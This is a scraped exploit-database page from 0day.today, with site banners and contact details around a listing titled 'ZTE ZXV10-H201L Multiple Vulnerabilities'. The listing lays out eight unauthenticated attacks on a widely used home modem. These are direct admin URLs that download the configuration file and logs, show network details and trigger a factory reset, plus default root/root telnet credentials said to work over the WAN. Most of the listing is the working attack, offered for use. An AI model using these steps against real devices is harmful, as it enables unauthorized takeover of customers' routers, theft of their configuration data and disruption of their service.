0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

ZTE ZXV10-H201L Multiple Vulnerabilities

Author

thewalk1ngshad0w

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

/-------------------------------------------------/
   /Exploits found by TheWalk1ngShad0w          /
 /My email: admin@thewalkingshadow.com   /
/-------------------------------------------------/



Exploit tested & working on modem with this build info:

-----------------------------------------
- Model:  ZXV10 H201L  --->  http://hu.ucoz.ru/FOTO/madema_nakh_telefonnaja.png
- Software version:  V1.0.01_CTT13
- HWVer:  V1.0.05
- SWVer:  V1.0.01_CTT13
-----------------------------------------


Short introduction:

This modem is used by many providers in the world, even in mine small country, but, it's full of vulnerabilities. Let me show them to you... All exploits down there are unauthorized, but can be done with admin account, and some of them are possible just on admin account, not on standard user's, but we are going to do it without admin and standard user login details.
----------------------------------------------------------------------------------------------------------------------

Exploit #1:
- User configuration bin file download

http://192.168.1.1/manager_dev_config_t.gch

When you get there, just press "Backup configuration" to download config file.
----------------------------------------------------------------------------------------------------------------------

Exploit #2:
- Reading log file & downloading it

http://192.168.1.1/manager_log_conf_t.gch

By entering here, you can read log file and download it on your PC by clicking "Download Log" button
----------------------------------------------------------------------------------------------------------------------

Exploit #3:
- VoIP status

http://192.168.1.1/status_voip_4less_t.gch

If you enter here, you will get list of VoIP devices(if any) on this modem and their network status(Registered/Not Registered on VoIP server)
----------------------------------------------------------------------------------------------------------------------

Exploit #4:
- Some basic router info(WiFi channel, MAC, WiFi Auth Type, WiFi Encryption Type etc...)

http://192.168.1.1/status_wlan_info_t.gch

Here you can see basic router info, not very useful, but you will probably need this sometimes...
----------------------------------------------------------------------------------------------------------------------

Exploit #5:
- Ethernet info

http://192.168.1.1/status_lan_info_t.gch

Data recieved by LAN cable port, LAN port status etc...
----------------------------------------------------------------------------------------------------------------------

Exploit #6:

- Reboot & Factory reset(Works on some models only, not working on mine, but working at friend's, cause he's got custom firmware)

http://192.168.1.1/manager_dev_conf_t.gch

Reboot & Factory Reset
-----------------------------------------------------------------------------------------------------------------------

Exploit #7:

- Advanced modem info(WAN IP, DNS Server, IPVersion, Management IP, NAT Status etc...)

http://192.168.1.1/IPv46_status_wan_if_t.gch

You can get almost anything about addresses linked with router(WAN IP, MAC, Management, DHCP, VoIP Addresses etc...)
-----------------------------------------------------------------------------------------------------------------------

Exploit #8:

- Remote telnet(Also working on WAN)

Username: root
Password: root
Address:Port: wanaddr:23

You can do anything you want with telnet, play with it
-----------------------------------------------------------------------------------------------------------------------

#  0day.today [2024-09-17]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

ZTE ZXV10-H201L Multiple Vulnerabilities

Report Error

Report Error